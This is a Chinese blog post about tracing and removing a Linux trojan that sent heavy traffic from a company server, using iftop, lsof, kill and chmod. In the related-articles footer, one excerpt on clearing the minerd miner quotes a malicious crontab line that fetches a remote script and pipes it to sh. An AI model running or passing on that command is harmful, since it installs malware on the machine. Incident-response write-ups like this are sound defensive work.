祭----------------一次查杀linux木马的经历

最新推荐文章于 2023-07-20 17:54:06 发布
最新推荐文章于 2023-07-20 17:54:06 发布
阅读量1.2k 收藏
点赞数
分类专栏: ★服务器 --------【LINUX】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ye1142262478/article/details/50696988
版权

症状表现:

公司内部网络有一天突然开始卡顿,有几个应用特别慢。网络人员查网络,发现有一台机子在大量的发送数据,大概每秒百兆这样子。

-------------------------------------------华丽丽的分割线-----------------------------------------------------

查找原因:

安装iftop:

由于那台机子没有装iftop等网络监控工具,因此首先需要装一个。

安装代码来自此处

[root@cifi-BI etc]# yum install flex byacc  libpcap ncurses ncurses-devel
Loaded plugins: security
Setting up Install Process
Nothing to do

报错,网上找原因。

我用yum装httpd 这个包出现这个错误怎么解决,我改yum配置文件了

[root@cifi-BI etc]# cd /etc/yum.repos.d
[root@cifi-BI yum.repos.d]# ll
total 0
此文件夹下没有文件

而根据网上所述,此处该有一个文件rhel-debuginfo.repo

于是下载此文件到当前目录下:

[root@cifi-BI yum.repos.d]# wgethttp://docs.linuxtone.org/soft/lemp/CentOS-Base.repo

并重命名为rhel-debuginfo.repo

然后再次查看:

[root@cifi-BI yum.repos.d]# ll
total 8
-rw-r--r-- 1 root root 1426 May 24  2009 CentOS-Base.repo
-rw-r--r-- 1 root root 1426 Feb 18 20:24 rhel-debuginfo.repo

继续安装:

[root@cifi-BI yum.repos.d]# yum install  flex byacc  libpcap ncurses ncurses-devel libpcap-devel

[root@cifi-BI /]# mkdir iftop_install
[root@cifi-BI /]# cd iftop_install/
[root@cifi-BI iftop_install]# ll
total 0
[root@cifi-BI iftop_install]# wget http://www.ex-parrot.com/pdw/iftop/download/iftop-0.17.tar.gz
[root@cifi-BI iftop_install]# tar zxvf iftop-0.17.tar.gz
[root@cifi-BI iftop_install]# cd iftop-0.17
[root@cifi-BI iftop-0.17]# ./configure
[root@cifi-BI iftop-0.17]# make && make install

安装成功。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

iftop监控:

监控网络(包括端口号):

代码出处:

[root@cifi-BI proc]# iftop -i eth0 -n -P

 

发现有个端口号在大量的发送数据,查此端口号的进程:

代码出处:

[root@cifi-BI ~]# lsof -Pnl +M -i4|grep 15612
Igoste     8343        0    5u  IPv4 326138       UDP *:15612

发现进程是Igoste,pid是8343

解决问题:

查看此进程
[root@cifi-BI tmp]# ps -ef | grep Igoste
root     20072     1 65 12:54 ?        00:01:36 /tmp/Igoste

查杀进程,并删除文件:
[root@cifi-BI tmp]# kill -9 20072
[root@cifi-BI tmp]# cd /tmp
[root@cifi-BI tmp]# rm -f Igoste
十几秒之后又重新启动,,,,,,,,,,,,,,

查启动文件---遍历所有文件夹 模糊查找--------

命令出处:
[root@cifi-BI /]# find /var  -type f -name '*Igoste*' > aaa.txt
[root@cifi-BI /]# cat aaa.txt
[root@cifi-BI /]#
------------------------------------------只有tmp下有一个Igoste

另外一个方法:杀进程,然后将/tmp/Igoste的权限赋为000

方法来自此处:
[root@cifi-BI tmp]# kill -9 20072
[root@cifi-BI tmp]# cd /tmp
[root@cifi-BI tmp]# chmod 000 Igoste

目前,没有再启动(有可能重启之后,会再次出现。。。。。。)

修改root密码!!!增加密码复杂度!!!

 

 

另附一个

如何检查linux系统是否中毒被入侵

 

 另:Oracle官方的回复给的建议:重装服务器

参考网址:

https://news.drweb.com/?i=5801&c=5&lng=en&p=0

https://securelist.com/analysis/publications/64361/versatile-ddos-trojan-for-linux/

 

 后问题反复,最终解决参考:

记一次Linux服务器上查杀木马经历

 Linux.BackDoor.Gates.5

 

 

 

 

 

 

 

 

 

 

 

 

黑衣者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024年运维最新linux企业版火绒(火绒终端安全管理系统V2(1)
2301_76225520的博客
05-01 1074
安装后显示 配置工具,按需修改端口等配置,也可直接关闭,后期在做修改。点击桌面,可打开(web页),使用。
清除Linux挖矿病毒
三少
03-21 1979
今天上服务器发现特别卡,有点奇怪,也没安装什么软件,况且昨天还是好好的。 top一下,不看不知道,一看吓一跳,有几个莫名的进程,CPU达到了200%。 查了下资料,才发现是被人利用挖矿了。 不过不要急,先把相关进程kill掉 然后进/etc里面查看相关文件 大概就是networkservice,sysupdate,sysupdates,config.json,sysguard这几个 注意,先用c...
Linux木马病毒处理
小树苗
10-13 4397
如果是云服务器可以在云监控态势与感知中直接获取木马文件相关进程name,id以及路径如下: 文件路径: /opt/apache-tomcat-7.0.104/bin/shell1.elf 恶意文件md5: 91cc7f105856a0e9eb6a29ef3d08d9ce 进程id: 27504 如果是物理机需要仔细去终端排查; top #仔细检查异常进程pid ls -l /proc/pid/exe #查看异常进程命令所在地 严重的时候木马病毒会修改或替换平时常用的系统命令 ps,ls等命令执行无..
Linux平台下木马rootkit的检测和防范
靠谱运维
07-20 1783
近些年来,在网络安全攻击中,高隐匿、高持久化的Rootkit技术成为黑客操控的主要手段,本文,我首先对Rootkit的几种类型进行介绍,主要让大家了解内核态Rootkit的高度定制化需求和Linux系统上存在的其他类型Rootkit,最后从攻防视角给出对Rootkit进行检测和防范的工具和方法。rootkit是Linux平台下最常见的一种木 马后门工具,它主要通过替换系统文件来达到攻 击和和隐蔽的目的,这种木 马比普通木 马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木 马。
服务器linux杀网页木马,一次Linux服务器木马查杀经历
weixin_42120563的博客
05-09 406
1客户自己的服务器由于种了木马,往外发送大量数据包,被服务商切断网络.虽然没有网络不能直接登录服务器,但是可以通过服务商提供的WEB控制面板进入操作系统.首先使用命令查看相关连接:netstat-natp,很明显看到了异常进程gettylsof-i:35308对应进程号,然后kill掉.使用命令last查看最近登录情况:其中有异常IP登录:60.28.121.160是天津的IP,而客户是...
第2章-操作系统配置.ppt
11-21
此外,通过修改配置或权限、安装安全工具软件,以及定期查杀病毒和木马,可以进一步提升系统的安全性。 注册表是Windows操作系统的核心组成部分,存储着系统和应用程序的设置信息。主要的注册表键包括HKEY_LOCAL_...
hcie-cloud笔试13-531.doc
02-08
13. **虚拟化防病毒功能**:FusionCompute的虚拟化防病毒功能不占用大量用户虚拟机网络资源,而是通过主机物理内存交换进行病毒查杀,效率高、速度快,同时不需要在用户虚拟机上安装完整的防病毒软件。 14. **...
行业资料-交通装置-一种木马查杀工具.zip
08-31
行业资料-交通装置-一种木马查杀工具.zip
ip-guard0912.zip
06-04
5. **终端安全**:提供病毒防护、木马查杀等终端安全服务,确保每一台接入网络的设备都受到充分保护。 6. **合规审计**:对于需要遵守特定法规的企业,IP-Guard能协助进行合规性审计,确保企业的网络行为符合相关...
linux-宝塔Linux面板简单好用的服务器运维面板
08-13
5. **安全防护**:内置防火墙规则配置,可以设置端口开放、禁止IP访问,以及进行木马查杀,增强服务器安全性。 6. **性能监控**:实时显示服务器资源使用情况,包括CPU、内存、磁盘I/O、网络流量等,帮助用户了解...
Linux下简单的木马查杀
周瑜的博客
02-07 1247
最近开发服务器经常报警,作为一个安防小菜鸟。总结了以下的查杀套路以供将来参考。2021-02-07 查杀思路 先查看系统中有没有异样的进程 找到异常进程之后 kill 掉 找到异常进程启动的位置并修复 具体的查杀步骤 先看到阿里云的报警信息 其实这里阿里云的报错还是挺清晰的了,主要是因为用nexus搭建的私服被破了,然后黑客通过nexus 执行了shell命令。(第一次看到这个后一脸懵逼,不知所措) 然后通过 top 查看运行的进程 发现了异常的进程 network01 kill -9
Linux系统是否被植入木马的排查流程梳理
bosschen
11-29 1118
Linux系统是否被植入木马的排查流程梳理
linux clamav 免费查毒工具
热门推荐
weixin_34129696的博客
04-05 11万+
linux下需要杀毒工具吗?我一直认为是不要的,基于linux的病毒很少,linux 安全防护也做的很好,一般很难功破。我想那些***们更喜欢,写windows下的病毒,用的人多啊,传播也容易。下面的操作,都是以管理员的身份来进行的。 一,安装clamavapt-get install clamav 根据系统的不同,用不同的命令,yum,pacman等。如果找不到包的话,只有下源码自己编译了。 二...
Linux清除木马minerd
骆驼大笨笨
08-02 9917
minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]
linux上php木马、后门查杀总结
张同光 (Tongguang Zhang):Hello everyone !
02-01 3228
http://ggmmchou.blog.163.com/blog/static/59333149201151733626676/ linux上php木马、后门查杀总结     经过联系断续一个月的对抗,网站被攻击、挂马、做SEO黑帽的问题终于告一段落,现在总结下经验。 Web Server(Nginx为例)1、为防止跨站感染,要做虚拟主机目录隔离(我是直接利用fpm建立多
Linux中招挖矿木马如何处置,附带解决方案
是故事啊~关注我~
01-25 6884
前段时间一位朋友在群里反应,公司的部署大数据集群的Linux服务器中了挖矿木马病毒,让我给他解决,分享一下解决方法。 一. 什么是挖矿木马 首先经过多年的演进,越来越多的挖矿木马利用多种方式入侵系统,意图感染更多的机器,提高挖矿的效率和收益,其中主要入侵方式如下: 1. 漏洞利用:利用系统漏洞快速获取相关服务器权限,植入挖矿木马是目前最为普遍的传播方式之一。常见的漏洞包括Windows系统漏洞、服务器组件插件漏洞、中间件漏洞、web漏洞等。 部分攻击者选择直接利用永恒之蓝...
Linux下随机10字符病毒的清除
人生就是一场修行
05-12 8388
一、现象服务器不停的向外发包,网络流量暴满,且CPU持续100%。远程登录后查看发现有一长度为10的随机字符串进程,kill掉,会重新生成另外长度为10的字符串进程。删除文件也会重复生成lsof -R | grep “/usr/bin”,发现主进程不变,总是产生几个辅进程,并且一直处于dedeted状态,这说明主进程会快速产生几个子进程,然后这些进程之间相互检测,一旦检测到病毒主体被删除或更改,就
微软瓦解Nitol僵尸网络
mmdev
09-26 581
微软刚刚瓦解了Nitol僵尸网络,控制了500多种不同恶意软件变体。该软件巨人表示这些恶意软件秘密地嵌入在盗版Windows软件中,通过供应链当中的脆弱节点传播。美国维吉尼亚州东区的地区法院同意微软通过接管3322.org这个域名、以及7万多个藏有该恶意软件的子域名瓦解Nitol僵尸网络。微软表示自从2008年以来该域名一直处于活跃状态。   该僵尸网络被拿下代表着最近六个月以来此类行动...
Linux下手动查杀木马过程
吕巡鑫
03-09 510
文章目录1 使用rootkit把木马程序的父进程和木马文件隐藏 (此章节实验需在CentOS 6下进行)1.1Rootkit概述1.2实战-通过rootkit隐蔽行踪1、安装adore-ng2、测试,查看帮助:实战1:演示ava提权功能1、准备测试环境2、创建一个普通用户3、通过ava命令提权,让普通用户xinsz08可以获得root权限4、使用r命令选项提权5、在别一个终端上查看,运行此vim...
ew430-6302-autorun.exe
最新发布
12-23
如果你在电脑上发现了ew430-6302-autorun.exe文件,应该立即进行一次全面的杀毒扫描,查杀所有可能的病毒和恶意软件。同时,你也可以尝试通过查找该文件名的相关信息,来了解它究竟是什么软件或者是不是恶意文件。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值